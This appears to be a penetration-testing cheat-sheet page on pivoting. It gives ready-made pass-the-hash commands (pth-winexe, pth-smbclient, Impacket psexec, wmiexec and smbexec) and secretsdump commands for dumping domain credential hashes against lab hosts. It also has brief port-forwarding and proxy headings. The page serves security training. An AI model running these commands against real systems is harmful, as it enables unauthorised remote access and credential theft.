pivoting

Passing The Hash

Syntax examples taken mostly from this awesome blog

https://blog.ropnop.com/practical-usage-of-ntlm-hashes/arrow-up-right

Several ways and tools you can run psexec or use hashes...

pth-toolkit

https://github.com/byt3bl33d3r/pth-toolkitarrow-up-right

pth-winexe -U cscou/kbryant%asdfasd21341241234asdasd:23423sdfasdf1234  //ordws01.cscou.lab cmd.exe
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share

Impacket

https://github.com/CoreSecurity/impacketarrow-up-right

psexec.py Administrator:crapass@10.10.10.10
psexec.py BUFU/spice1:vallejo@10.10.10.10 
psexec.py Administrator@10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
smbexec.py BUFU/spice1:eastbayg@10.10.10.10 (doesnt drop a binary)
wmiexec.py BUFU/blegit:valleyho@10.10.10.10
secretsdump.py -dc-ip IP AD\administrator@domain -use-vss
secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1

CrackMapExec

https://github.com/byt3bl33d3r/CrackMapExecarrow-up-right

Nmap

Rdesktop

Port Forwarding

SOCKS Proxy

Proxychains

Config file: /etc/proxychains.conf

Set the SOCKS4 proxy then proxychains whatever tool

Windows netsh Port Forwarding

Meterpreter portfwd

https://www.offensive-security.com/metasploit-unleashed/portfwd/arrow-up-right forward remote port to local address

SSH pivots from one network to another

Remote Port Forwarding

SShuttle

https://sshuttle.readthedocs.io/en/stable/usage.htmlarrow-up-right

To sshuttle into an internal network and forward all traffic

References

https://chryzsh.gitbooks.io/pentestbook/content/port_forwarding_and_tunneling.htmlarrow-up-right

https://blog.ropnop.com/arrow-up-right

https://www.toshellandback.com/2017/02/11/psexec/arrow-up-right

https://blog.ropnop.com/practical-usage-of-ntlm-hashes/arrow-up-right

Last updated

Was this helpful?